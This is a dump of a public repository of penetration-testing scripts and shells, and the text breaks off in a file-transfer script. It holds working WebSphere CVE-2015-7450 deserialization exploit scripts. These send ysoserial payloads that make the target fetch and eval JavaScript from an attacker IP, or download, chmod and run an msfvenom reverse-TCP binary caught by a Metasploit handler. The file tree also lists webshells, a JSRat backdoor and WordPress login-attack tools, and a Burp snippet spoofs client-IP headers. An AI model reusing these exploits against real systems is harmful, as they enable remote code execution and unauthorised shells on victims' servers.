├── Invoke-Shellcode.ps1 ├── README.md ├── SimpleHTTPServerWithUpload.py ├── android-strace ├── README.md ├── strace └── strace.rar ├── automate-drozer.py ├── burp-python-scripter └── add-header-random-ip.py ├── censys_ip_port_info.py ├── deserilization_exploit ├── test_websphere_CVE-2015-7450.sh ├── websphere_CVE-2015-7450.sh └── ysoserial-0.0.4-all.jar ├── exploit-writing ├── MSECExtensions_1_6_0.zip ├── README.md └── msecdbg-83548.zip ├── file-transfer ├── file_client.py ├── file_server.py └── ideone_transfer.py ├── format-usb.ps1 ├── generate-ssl-cert-key.txt ├── host-ip.ps1 ├── http-reflect.py ├── http-status.nse ├── ip-host.ps1 ├── ip2country.py ├── javascript-backdoor ├── JSRat.ps1 ├── README.md ├── py-jsrat.zip └── py-jsrat │ ├── JSRat.py │ └── classes │ ├── __init__.py │ └── colors.py ├── linuxprivchecker.py ├── nmap-files ├── nmap-ip-port-service-info-ssl-detect.py ├── nmap-ip-port-service-info.py ├── nmap-port-gen.py ├── nmap-top-ports.txt └── nmaptocsv.py ├── nmap-xml-parser.py ├── p0wnedshell ├── README.md ├── Smallp0wnedShell-x64.exe ├── Smallp0wnedShell-x86.exe ├── p0wnedShell-x64.exe └── p0wnedShell-x86.exe ├── patchextract.ps1 ├── port_response_time.py ├── ps-cmd.txt ├── quick-one-liners.md ├── shodan_ip_port_info.py ├── simple-https-server.py ├── web_capture.py ├── webshell ├── mysql-cmd-upload.php ├── shell.asp └── shell.php ├── websphere-xor-password-decode-encode.py ├── windows-bins ├── calc.exe ├── cmd.exe └── readme.md ├── wordpress ├── wordpress-plugins.txt ├── wordpress-themes.txt ├── wp_full_path_disclosure.py ├── wp_login_attack_jetpack.py ├── wp_login_user_enumeration.py ├── wp_plugin_enum.py ├── wp_user_enumeration_with_plugin_bypass.py └── wp_xss2rce.js ├── wordpress_plugins.txt ├── wordpress_themes.txt └── wpshell.zip /README.md: -------------------------------------------------------------------------------- 1 | # scripts-tools-shells 2 | -------------------------------------------------------------------------------- 
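#!/usr/bin/env python

"""Simple HTTP Server With Upload (SimpleHTTPServerWithUpload.py).

This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner, plus a POST handler
that accepts one multipart/form-data file upload per request.

Python 2 only (BaseHTTPServer, cStringIO, mimetools-style headers).

Review notes:
- Uploaded files are written into the directory the request path maps to
  under the current working directory.  The client-supplied filename is
  reduced to its basename, so "../" or absolute paths cannot escape that
  directory (the original joined the raw filename, allowing traversal).
  Existing files with the same name are silently overwritten.
- Everything reflected into HTML (Referer, result message, directory
  entries) is escaped with cgi.escape.
- There is no authentication and no TLS: anybody who can reach the port
  can read the served tree and write files into it.  BaseHTTPServer.test()
  binds to all interfaces, so run this only on a network you trust.
"""


__version__ = "0.1"
__all__ = ["SimpleHTTPRequestHandler"]
__author__ = "bones7456"
__home_page__ = "http://li2z.cn/"

import os
import posixpath
import BaseHTTPServer
import urllib
import cgi
import shutil
import mimetypes
import re
try:
    from cStringIO import StringIO
except ImportError:
    from StringIO import StringIO


class SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):

    """Simple HTTP request handler with GET/HEAD/POST commands.

    This serves files from the current directory and any of its
    subdirectories.  The MIME type for files is determined by calling
    the .guess_type() method.  POST stores one uploaded file in the
    directory addressed by the request path.

    The GET/HEAD/POST requests are identical except that the HEAD
    request omits the actual contents of the file.
    """

    server_version = "SimpleHTTPWithUpload/" + __version__

    # Part header of the uploaded file.  [^"]* rather than .* so that a
    # crafted filename cannot swallow the rest of the header line.
    _FILENAME_RE = re.compile(
        r'Content-Disposition.*name="file"; filename="([^"]*)"')

    def do_GET(self):
        """Serve a GET request."""
        f = self.send_head()
        if f:
            try:
                self.copyfile(f, self.wfile)
            finally:
                f.close()

    def do_HEAD(self):
        """Serve a HEAD request (headers only)."""
        f = self.send_head()
        if f:
            f.close()

    def do_POST(self):
        """Serve a POST request: store the upload, then show a result page."""
        r, info = self.deal_post_data()
        print r, info, "by: ", self.client_address
        # Referer is optional; a missing header used to raise KeyError (500).
        referer = self.headers.get('referer') or '/'
        f = StringIO()
        f.write('<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">')
        f.write("<html>\n<title>Upload Result Page</title>\n")
        f.write("<body>\n<h2>Upload Result Page</h2>\n")
        f.write("<hr>\n")
        if r:
            f.write("<strong>Success:</strong>")
        else:
            f.write("<strong>Failed:</strong>")
        # The message carries the client-chosen filename and the Referer
        # is client-controlled: escape both before reflecting them.
        f.write(cgi.escape(info, quote=True))
        f.write("<br><a href=\"%s\">back</a>" % cgi.escape(referer, quote=True))
        f.write("<hr><small>Powerd By: bones7456, check new version at ")
        f.write("<a href=\"%s?s=SimpleHTTPServerWithUpload\">" % __home_page__)
        f.write("here</a>.</small></body>\n</html>\n")
        length = f.tell()
        f.seek(0)
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.send_header("Content-Length", str(length))
        self.end_headers()
        try:
            self.copyfile(f, self.wfile)
        finally:
            f.close()

    def deal_post_data(self):
        """Read one multipart/form-data file part and store it on disk.

        Returns a (success, message) tuple.  The target path is the
        directory the request path maps to, joined with the *basename*
        of the client-supplied filename.
        """
        # plisttext is the parameter part of Content-Type, e.g.
        # '; boundary=----WebKitFormBoundary...'.
        plist = self.headers.plisttext or ''
        if "boundary=" not in plist:
            return (False, "Content-Type has no multipart boundary")
        boundary = plist.split("boundary=", 1)[1].strip().strip('"')
        try:
            remainbytes = int(self.headers.get('content-length', ''))
        except ValueError:
            return (False, "Missing or invalid Content-Length")
        line = self.rfile.readline()
        remainbytes -= len(line)
        if not boundary in line:
            return (False, "Content NOT begin with boundary")
        line = self.rfile.readline()
        remainbytes -= len(line)
        fn = self._FILENAME_RE.findall(line)
        if not fn:
            return (False, "Can't find out file name...")
        # Path-traversal guard: keep only the last path component, treating
        # both separators as such (os.path.basename ignores '\' on POSIX),
        # and refuse names that cannot denote a new regular entry.
        name = os.path.basename(fn[0].replace("\\", "/"))
        if name in ("", os.curdir, os.pardir):
            return (False, "Invalid file name")
        path = self.translate_path(self.path)
        fn = os.path.join(path, name)
        line = self.rfile.readline()   # Content-Type of the part
        remainbytes -= len(line)
        line = self.rfile.readline()   # blank line closing the part header
        remainbytes -= len(line)
        try:
            out = open(fn, 'wb')
        except IOError:
            return (False, "Can't create file to write, do you have permission to write?")

        try:
            preline = self.rfile.readline()
            remainbytes -= len(preline)
            while remainbytes > 0:
                line = self.rfile.readline()
                remainbytes -= len(line)
                if boundary in line:
                    # Strip the CRLF that precedes the closing boundary.
                    preline = preline[0:-1]
                    if preline.endswith('\r'):
                        preline = preline[0:-1]
                    out.write(preline)
                    # Report the name, not the server-side absolute path.
                    return (True, "File '%s' upload success!" % name)
                else:
                    out.write(preline)
                    preline = line
            return (False, "Unexpect Ends of data.")
        finally:
            out.close()

    def send_head(self):
        """Common code for GET and HEAD commands.

        This sends the response code and MIME headers.

        Return value is either a file object (which has to be copied
        to the outputfile by the caller unless the command was HEAD,
        and must be closed by the caller under all circumstances), or
        None, in which case the caller has nothing further to do.
        """
        path = self.translate_path(self.path)
        f = None
        if os.path.isdir(path):
            if not self.path.endswith('/'):
                # redirect browser - doing basically what apache does
                self.send_response(301)
                self.send_header("Location", self.path + "/")
                self.end_headers()
                return None
            for index in "index.html", "index.htm":
                index = os.path.join(path, index)
                if os.path.exists(index):
                    path = index
                    break
            else:
                return self.list_directory(path)
        ctype = self.guess_type(path)
        try:
            # Always read in binary mode. Opening files in text mode may cause
            # newline translations, making the actual size of the content
            # transmitted *less* than the content-length!
            f = open(path, 'rb')
        except IOError:
            self.send_error(404, "File not found")
            return None
        self.send_response(200)
        self.send_header("Content-type", ctype)
        fs = os.fstat(f.fileno())
        self.send_header("Content-Length", str(fs[6]))
        self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
        self.end_headers()
        return f

    def list_directory(self, path):
        """Helper to produce a directory listing (absent index.html).

        Return value is either a file object, or None (indicating an
        error).  In either case, the headers are sent, making the
        interface the same as for send_head().  The page also carries
        the upload form that do_POST() consumes (field name "file").
        """
        try:
            entries = os.listdir(path)
        except os.error:
            self.send_error(404, "No permission to list directory")
            return None
        entries.sort(key=lambda a: a.lower())
        f = StringIO()
        displaypath = cgi.escape(urllib.unquote(self.path))
        f.write('<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">')
        f.write("<html>\n<title>Directory listing for %s</title>\n" % displaypath)
        f.write("<body>\n<h2>Directory listing for %s</h2>\n" % displaypath)
        f.write("<hr>\n")
        f.write("<form ENCTYPE=\"multipart/form-data\" method=\"post\">")
        f.write("<input name=\"file\" type=\"file\"/>")
        f.write("<input type=\"submit\" value=\"upload\"/></form>\n")
        f.write("<hr>\n<ul>\n")
        # Entry loop follows the stdlib SimpleHTTPServer implementation.
        for name in entries:
            fullname = os.path.join(path, name)
            displayname = linkname = name
            # Append / for directories or @ for symbolic links
            if os.path.isdir(fullname):
                displayname = name + "/"
                linkname = name + "/"
            if os.path.islink(fullname):
                displayname = name + "@"
                # Note: a link to a directory displays with @ and links with /
            # File names are data from the exposed file system (including
            # anything uploaded): escape them so they cannot inject markup.
            f.write('<li><a href="%s">%s</a>\n'
                    % (urllib.quote(linkname), cgi.escape(displayname)))
        f.write("</ul>\n<hr>\n</body>\n</html>\n")
        length = f.tell()
        f.seek(0)
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.send_header("Content-Length", str(length))
        self.end_headers()
        return f

    def translate_path(self, path):
        """Translate a /-separated PATH to the local filename syntax.

        Components that mean special things to the local file system
        (e.g. drive or directory names) are ignored. (XXX They should
        probably be diagnosed.)  normpath() collapses ".." first and the
        loop below drops any "." / ".." component that survives, so the
        result always lies under the current working directory.
        """
        # abandon query parameters
        path = path.split('?', 1)[0]
        path = path.split('#', 1)[0]
        path = posixpath.normpath(urllib.unquote(path))
        words = path.split('/')
        words = filter(None, words)
        path = os.getcwd()
        for word in words:
            drive, word = os.path.splitdrive(word)
            head, word = os.path.split(word)
            if word in (os.curdir, os.pardir):
                continue
            path = os.path.join(path, word)
        return path

    def copyfile(self, source, outputfile):
        """Copy all data between two file objects.

        The SOURCE argument is a file object open for reading
        (or anything with a read() method) and the DESTINATION
        argument is a file object open for writing (or
        anything with a write() method).

        The only reason for overriding this would be to change
        the block size or perhaps to replace newlines by CRLF
        -- note however that this the default server uses this
        to copy binary data as well.
        """
        shutil.copyfileobj(source, outputfile)

    def guess_type(self, path):
        """Guess the type of a file.

        Argument is a PATH (a filename).

        Return value is a string of the form type/subtype,
        usable for a MIME Content-type header.

        The default implementation looks the file's extension
        up in the table self.extensions_map, using application/octet-stream
        as a default; however it would be permissible (if
        slow) to look inside the data to make a better guess.
        """
        base, ext = posixpath.splitext(path)
        if ext in self.extensions_map:
            return self.extensions_map[ext]
        ext = ext.lower()
        if ext in self.extensions_map:
            return self.extensions_map[ext]
        else:
            return self.extensions_map['']

    if not mimetypes.inited:
        mimetypes.init()  # try to read system mime.types
    extensions_map = mimetypes.types_map.copy()
    extensions_map.update({
        '': 'application/octet-stream',  # Default
        '.py': 'text/plain',
        '.c': 'text/plain',
        '.h': 'text/plain',
    })


def test(HandlerClass=SimpleHTTPRequestHandler,
         ServerClass=BaseHTTPServer.HTTPServer):
    """Serve the current directory; port from argv[1] (default 8000).

    BaseHTTPServer.test() binds to all interfaces ('') and offers no way
    to restrict that here, so firewall the port if the host is exposed.
    """
    BaseHTTPServer.test(HandlerClass, ServerClass)


if __name__ == '__main__':
    test()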
261 | 262 | The default implementation looks the file's extension 263 | up in the table self.extensions_map, using application/octet-stream 264 | as a default; however it would be permissible (if 265 | slow) to look inside the data to make a better guess. 266 | 267 | """ 268 | 269 | base, ext = posixpath.splitext(path) 270 | if ext in self.extensions_map: 271 | return self.extensions_map[ext] 272 | ext = ext.lower() 273 | if ext in self.extensions_map: 274 | return self.extensions_map[ext] 275 | else: 276 | return self.extensions_map[''] 277 | 278 | if not mimetypes.inited: 279 | mimetypes.init() # try to read system mime.types 280 | extensions_map = mimetypes.types_map.copy() 281 | extensions_map.update({ 282 | '': 'application/octet-stream', # Default 283 | '.py': 'text/plain', 284 | '.c': 'text/plain', 285 | '.h': 'text/plain', 286 | }) 287 | 288 | 289 | def test(HandlerClass = SimpleHTTPRequestHandler, 290 | ServerClass = BaseHTTPServer.HTTPServer): 291 | BaseHTTPServer.test(HandlerClass, ServerClass) 292 | 293 | if __name__ == '__main__': 294 | test() 295 | -------------------------------------------------------------------------------- /android-strace/README.md: -------------------------------------------------------------------------------- 1 | # Android Strace 2 | 3 | Obtained binary strace file for Android from https://forum.xda-developers.com/showpost.php?p=76141375&postcount=3458 4 | 5 | ```IMPORTANT: Use with caution, this is binary file obtained from untrusted source. 
Use at your own risk.``` 6 | -------------------------------------------------------------------------------- /android-strace/strace: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/android-strace/strace -------------------------------------------------------------------------------- /android-strace/strace.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/android-strace/strace.rar -------------------------------------------------------------------------------- /automate-drozer.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import sys 3 | 4 | if len(sys.argv)<3: 5 | print "Usage: " + sys.argv[0] + " " 6 | print "Usage: " + sys.argv[0] + " " + "c:\\drozer\\drozer.bat" 7 | exit(0) 8 | 9 | #Path to your drozer file 10 | drozer_path = sys.argv[2] 11 | #drozer_path = "c:\\drozer\\drozer.bat" 12 | #Store HTML output 13 | html = "Report: %s

%s

" % (sys.argv[1],sys.argv[1]) 14 | 15 | def execute_test(test, pname,e=0): 16 | drozer_cmd = drozer_path + ' console connect -c "run ' + test + ' ' + pname + '"' 17 | if e==1: 18 | drozer_cmd = drozer_path + ' console connect -c "run ' + test + ' ' + '"' 19 | process = subprocess.Popen(drozer_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 20 | input,output,error = process.stdin,process.stdout,process.stderr 21 | #input.write("hello world !") 22 | data = output.read().decode('latin1') 23 | input.close() 24 | output.close() 25 | status = process.wait() 26 | if int(data.find("could not find the package"))!=-1: 27 | data = "Invalid package" 28 | else: 29 | #print "Valid package" 30 | pass 31 | return data 32 | 33 | def process_data(heading, out): 34 | html_out = 1 35 | separator = ("*"*50) 36 | print "\n%s:\n%s\n%s" % (heading,separator,out) 37 | out = out.replace("&","&").replace("<","<").replace(">",">").replace("\\n","
").replace("\\r","") 38 | if html_out: 39 | global html 40 | html += "
" + heading + "
" + out + "


" 41 | 42 | if __name__ == '__main__': 43 | pname = sys.argv[1] 44 | separator = ("*"*50) 45 | #Get package information 46 | package_info = execute_test('app.package.info -a', pname) 47 | process_data("Package Information", package_info) 48 | #Get activity information 49 | activity_info = execute_test('app.activity.info -i -u -a', pname) 50 | process_data("Activities Information", activity_info) 51 | #Get broadcast receiver information 52 | broadcast_info = execute_test('app.broadcast.info -i -u -a', pname) 53 | process_data("Broadcast Receivers Information", broadcast_info) 54 | #Get attack surface details 55 | attacksurface_info = execute_test('app.package.attacksurface', pname) 56 | process_data("Attack Surface Information", attacksurface_info) 57 | #Get package with backup API details 58 | backupapi_info = execute_test('app.package.backup -f', pname) 59 | process_data("Package with Backup API Information", backupapi_info) 60 | #Get Android Manifest of the package 61 | manifest_info = execute_test('app.package.manifest', pname) 62 | process_data("Android Manifest File", manifest_info) 63 | #Get native libraries information 64 | nativelib_info = execute_test('app.package.native', pname) 65 | process_data("Native Libraries used", nativelib_info) 66 | #Get content provider information 67 | contentprovider_info = execute_test('app.provider.info -u -a', pname) 68 | process_data("Content Provider Information", contentprovider_info) 69 | #Get URIs from package 70 | finduri_info = execute_test('app.provider.finduri', pname) 71 | process_data("Content Provider URIs", finduri_info) 72 | #Get services information 73 | services_info = execute_test('app.service.info -i -u -a', pname) 74 | process_data("Services Information", services_info) 75 | #Get native components included in package 76 | nativecomponents_info = execute_test('scanner.misc.native -a', pname) 77 | process_data("Native Components in Package", nativecomponents_info) 78 | #Get world readable files in app 
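# burp-python-scripter/add-header-random-ip.py
#
# Burp "Python Scripter" snippet.  Scripter executes this with the names
# messageIsRequest, toolFlag, callbacks, helpers and messageInfo injected;
# it adds the usual client-IP override headers, each with a fresh random
# IPv4 address, to every outgoing request except those made by Extender.
#
# Note: this only affects targets that trust X-Forwarded-For style headers
# (rate limiters, IP allow-lists behind a reverse proxy); the real source
# address of the connection is unchanged.

import random


def generate_random_ip():
    """Return a random dotted-quad IPv4 string with octets in 0..255.

    random.randint() is inclusive on both ends, so the original
    randint(0, 256) could emit the invalid octet 256.
    """
    return ".".join(str(random.randint(0, 255)) for _ in range(4))


# Header names injected into each request.
SPOOF_HEADERS = ('X-Forwarded-For', 'X-Originating-IP', 'X-Remote-IP',
                 'X-Remote-Addr', 'X-Client-IP')

# Only act when executed by Scripter, which injects messageIsRequest into
# the script's globals; importing the file elsewhere just defines the
# helper above.
if globals().get('messageIsRequest'):
    # if toolFlag in (callbacks.TOOL_PROXY,):
    if toolFlag not in (callbacks.TOOL_EXTENDER,):
        # if callbacks.isInScope(messageInfo.getUrl()):
        requestInfo = helpers.analyzeRequest(messageInfo.getRequest())
        headers = requestInfo.getHeaders()
        requestBody = messageInfo.getRequest()[requestInfo.getBodyOffset():]
        for header_name in SPOOF_HEADERS:
            headers.add('%s: %s' % (header_name, generate_random_ip()))
        request = helpers.buildHttpMessage(headers, requestBody)
        messageInfo.setRequest(request)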
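#!/usr/bin/python
"""censys_ip_port_info.py: print "ip,port,protocol" rows for a list of IPs.

Usage:   python censys_ip_port_info.py <ip_list_file>
Example: python censys_ip_port_info.py ip_list.lst

Data source: https://www.censys.io/
Author: Interference Security

Review notes:
- Credentials are read from the CENSYS_UID / CENSYS_SECRET environment
  variables (visit https://www.censys.io/account to get them); the
  placeholders are only a fallback so that a real API secret never has to
  be written into this file.
- The query body is built with json.dumps, so an input line containing
  quotes or backslashes cannot break out of the JSON string.
- Blank lines in the input are skipped instead of being sent as queries.
"""
from __future__ import print_function

import json
import os
import sys

API_URL = "https://www.censys.io/api/v1"
UID = os.environ.get("CENSYS_UID", "YOUR_UID_OR_API_ID_HERE")
SECRET = os.environ.get("CENSYS_SECRET", "YOUR_SECRET_HERE")


def build_query(ip_addr):
    """Return the JSON request body for one IPv4 search."""
    return json.dumps({"query": ip_addr, "fields": ["ip", "protocols"]})


def parse_results(results):
    """Turn the API "results" list into (ip, port, protocol) tuples.

    Only the first hit is used, as in the original.  Each protocols entry
    looks like "443/https"; an entry without "/" yields an empty protocol.
    """
    if not results:
        return []
    first = results[0]
    rows = []
    for port_protocol in first["protocols"]:
        port, _, protocol = port_protocol.partition("/")
        rows.append((first["ip"], port, protocol))
    return rows


def lookup(ip_addr):
    """Query Censys for ip_addr; None on a non-200 response."""
    import requests  # third-party; imported here so the helpers above work without it
    res = requests.post(API_URL + "/search/ipv4", auth=(UID, SECRET),
                        data=build_query(ip_addr), timeout=30)
    if res.status_code != 200:
        return None
    return parse_results(res.json().get("results", []))


def main(argv):
    """Entry point; returns the process exit status."""
    if len(argv) != 2:
        print("Usage: python " + argv[0] + " <ip_list_file>")
        return 1
    with open(argv[1], "r") as f:
        all_ips = [line.strip() for line in f if line.strip()]
    for ip_addr in all_ips:
        rows = lookup(ip_addr)
        if rows is None:
            print(ip_addr + ",Error,Error")
            continue
        for res_ip, port, protocol in rows:
            print(res_ip + "," + port + "," + protocol)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))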
port_protocol.split("/") 35 | print res_ip + "," + pp[0] + "," + pp[1] 36 | -------------------------------------------------------------------------------- /deserilization_exploit/test_websphere_CVE-2015-7450.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Inteference Security 4 | # Twitter: https://twitter.com/xploresec 5 | # Credits: foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ 6 | 7 | if [ $# -lt 4 ]; then 8 | echo "$0 " 9 | exit 10 | fi 11 | 12 | target_ip=$1 13 | target_port=$2 14 | target_type=$3 15 | target_prot=$4 16 | 17 | final_target="$target_prot://$target_ip:$target_port" 18 | 19 | echo "[*] Target: $final_target" 20 | echo "[*] Type: $target_type" 21 | echo "" 22 | 23 | if [ "$target_type" == "windows" ]; then 24 | echo "[*] Attacking Windows target" 25 | echo "" 26 | echo "Make sure you have one of the two setup and ready before continuing:" 27 | echo "1. Python JSRat: https://github.com/interference-security/scripts-tools-shells/tree/master/javascript-backdoor/py-jsrat" 28 | echo "2. 
PowerShell JSRat: https://github.com/interference-security/scripts-tools-shells/blob/master/javascript-backdoor/JSRat.ps1" 29 | echo "" 30 | read -p "Enter IP to receive reverse shell: " attacker_ip 31 | echo "" 32 | payload=`java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "rundll32.exe javascript:\"\..\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://$attacker_ip/connect\",false);h.Send();B=h.ResponseText;eval(B)" | base64 -w 0` 33 | final_payload="BasicAuth$payloadringBufferSize" 34 | echo "[*] Sending exploit payload" 35 | send_payload=`curl -s --insecure -i -H "Content-Type: text/xml; charset=utf-8" -H "SOAPAction: \"urn:AdminService\"" -H "User-Agent:" -H "Accept:" -H "Expect:" $final_target -X POST -d "$final_payload"` 36 | fi 37 | 38 | if [ "$target_type" == "linux" ]; then 39 | echo "[*] Attacking Linux target" 40 | echo "" 41 | echo "Make sure you have one of the two setup and ready before continuing:" 42 | echo "1. Python JSRat: https://github.com/interference-security/scripts-tools-shells/tree/master/javascript-backdoor/py-jsrat" 43 | echo "2. 
PowerShell JSRat: https://github.com/interference-security/scripts-tools-shells/blob/master/javascript-backdoor/JSRat.ps1" 44 | echo "" 45 | read -p "Enter attacker IP address: " attacker_ip 46 | echo "" 47 | read -p "Enter port to start webserver on: " web_port 48 | echo "" 49 | echo "[*] Starting webserver on port $web_port" 50 | python -m SimpleHTTPServer $web_port & 51 | # Upload Metasploit payload on target server 52 | payload=`java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "wget -O /tmp/ibmwsexp http://$attacker_ip:$web_port/ibmwsexp" | base64 -w 0` 53 | final_payload="BasicAuth$payloadringBufferSize" 54 | echo "" 55 | echo "[*] Sending exploit payload to check for vulnerability" 56 | send_payload=`curl -s --insecure -i -H "Content-Type: text/xml; charset=utf-8" -H "SOAPAction: \"urn:AdminService\"" -H "User-Agent:" -H "Accept:" -H "Expect:" $final_target -X POST -d "$final_payload"` 57 | read -p "Press [ENTER] to stop..." 58 | trap 'kill $(jobs -p)' EXIT 59 | fi 60 | -------------------------------------------------------------------------------- /deserilization_exploit/websphere_CVE-2015-7450.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Inteference Security 4 | # Twitter: https://twitter.com/xploresec 5 | # Credits: foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ 6 | 7 | if [ $# -lt 4 ]; then 8 | echo "$0 " 9 | exit 10 | fi 11 | 12 | target_ip=$1 13 | target_port=$2 14 | target_type=$3 15 | target_prot=$4 16 | 17 | final_target="$target_prot://$target_ip:$target_port" 18 | 19 | echo "[*] Target: $final_target" 20 | echo "[*] Type: $target_type" 21 | echo "" 22 | 23 | if [ "$target_type" == "windows" ]; then 24 | echo "[*] Attacking Windows target" 25 | echo "" 26 | echo "Make sure you have one of the two setup and ready before continuing:" 27 | echo "1. 
Python JSRat: https://github.com/interference-security/scripts-tools-shells/tree/master/javascript-backdoor/py-jsrat" 28 | echo "2. PowerShell JSRat: https://github.com/interference-security/scripts-tools-shells/blob/master/javascript-backdoor/JSRat.ps1" 29 | echo "" 30 | read -p "Enter IP to receive reverse shell: " attacker_ip 31 | echo "" 32 | payload=`java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "rundll32.exe javascript:\"\..\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://$attacker_ip/connect\",false);h.Send();B=h.ResponseText;eval(B)" | base64 -w 0` 33 | final_payload="BasicAuth$payloadringBufferSize" 34 | echo "[*] Sending exploit payload" 35 | send_payload=`curl -s --insecure -i -H "Content-Type: text/xml; charset=utf-8" -H "SOAPAction: \"urn:AdminService\"" -H "User-Agent:" -H "Accept:" -H "Expect:" $final_target -X POST -d "$final_payload"` 36 | fi 37 | 38 | if [ "$target_type" == "linux" ]; then 39 | echo "[*] Attacking Linux target" 40 | echo "" 41 | echo "Make sure you have one of the two setup and ready before continuing:" 42 | echo "1. Python JSRat: https://github.com/interference-security/scripts-tools-shells/tree/master/javascript-backdoor/py-jsrat" 43 | echo "2. 
PowerShell JSRat: https://github.com/interference-security/scripts-tools-shells/blob/master/javascript-backdoor/JSRat.ps1" 44 | echo "" 45 | read -p "Enter IP to receive reverse shell: " attacker_ip 46 | read -p "Enter port to receive reverse shell: " attacker_port 47 | echo "" 48 | echo "[*] Generating Metasploit payload" 49 | msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=$attacker_ip LPORT=$attacker_port -b '\\x00' -e x86/shikata_ga_nai -f elf -o ./ibmwsexp 50 | echo "" 51 | read -p "Enter port to start webserver on: " web_port 52 | echo "" 53 | echo "[*] Starting webserver on port $web_port" 54 | python -m SimpleHTTPServer $web_port & 55 | # Upload Metasploit payload on target server 56 | payload=`java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "wget -O /tmp/ibmwsexp http://$attacker_ip:$web_port/ibmwsexp" | base64 -w 0` 57 | final_payload="BasicAuth$payloadringBufferSize" 58 | echo "" 59 | echo "[*] Sending exploit payload to download Metasploit payload" 60 | send_payload=`curl -s --insecure -i -H "Content-Type: text/xml; charset=utf-8" -H "SOAPAction: \"urn:AdminService\"" -H "User-Agent:" -H "Accept:" -H "Expect:" $final_target -X POST -d "$final_payload"` 61 | # Make uploaded Metasploit payload executable 62 | payload=`java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "chmod a+x /tmp/ibmwsexp" | base64 -w 0` 63 | final_payload="BasicAuth$payloadringBufferSize" 64 | echo "[*] Making uploaded Metasploit payload executable" 65 | send_payload=`curl -s --insecure -i -H "Content-Type: text/xml; charset=utf-8" -H "SOAPAction: \"urn:AdminService\"" -H "User-Agent:" -H "Accept:" -H "Expect:" $final_target -X POST -d "$final_payload"` 66 | # Execute uploaded Metasploit payload 67 | payload=`java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "/tmp/ibmwsexp" | base64 -w 0` 68 | final_payload="BasicAuth$payloadringBufferSize" 69 | echo "" 70 | echo "[*] Open msfconsole and execute the following commands:" 71 | echo "use 
exploit/multi/handler" 72 | echo "set PAYLOAD linux/x86/shell/reverse_tcp" 73 | echo "set LHOST $attacker_ip" 74 | echo "set LPORT $attacker_port" 75 | echo "exploit" 76 | echo "" 77 | read -p "[*] Press ENTER to execute Metasploit payload: " anything 78 | echo "" 79 | echo "[*] Executing uploaded Metasploit payload" 80 | send_payload=`curl -s --insecure -i -H "Content-Type: text/xml; charset=utf-8" -H "SOAPAction: \"urn:AdminService\"" -H "User-Agent:" -H "Accept:" -H "Expect:" $final_target -X POST -d "$final_payload"` 81 | trap 'kill $(jobs -p)' EXIT 82 | fi 83 | -------------------------------------------------------------------------------- /deserilization_exploit/ysoserial-0.0.4-all.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/deserilization_exploit/ysoserial-0.0.4-all.jar -------------------------------------------------------------------------------- /exploit-writing/MSECExtensions_1_6_0.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/exploit-writing/MSECExtensions_1_6_0.zip -------------------------------------------------------------------------------- /exploit-writing/README.md: -------------------------------------------------------------------------------- 1 | # Tools for exploit writing 2 | -------------------------------------------------------------------------------- /exploit-writing/msecdbg-83548.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/exploit-writing/msecdbg-83548.zip -------------------------------------------------------------------------------- 
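# ==== file-transfer/file_client.py ====
"""Send one file to file_server.py over a plain TCP socket.

Usage: file_client.py <server_ip> <server_port> <file_to_send>

Review note: the transfer is unauthenticated and unencrypted; anyone on the
path can read or alter the file.  Use it only on a network you control, or
tunnel it (e.g. over SSH).
"""
from __future__ import print_function

import socket
import sys

CHUNK_SIZE = 102400


def send_file(sock, fobj):
    """Stream fobj (opened in binary mode) to sock until EOF."""
    chunk = fobj.read(CHUNK_SIZE)
    while chunk:
        # sendall() loops until the whole chunk is written; the original
        # used send(), which may write only part of it and silently drop
        # the rest.
        sock.sendall(chunk)
        chunk = fobj.read(CHUNK_SIZE)


def main(argv):
    """Entry point; returns the process exit status."""
    if len(argv) != 4:
        print("\nUsage: file_client.py <server_ip> <server_port> <file_to_send>")
        return 1
    sock = socket.socket()
    try:
        sock.connect((argv[1], int(argv[2])))
        with open(argv[3], "rb") as fobj:
            send_file(sock, fobj)
    finally:
        sock.close()
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))


# ==== file-transfer/file_server.py ====
"""Receive one file from file_client.py and store it at <output_file>.

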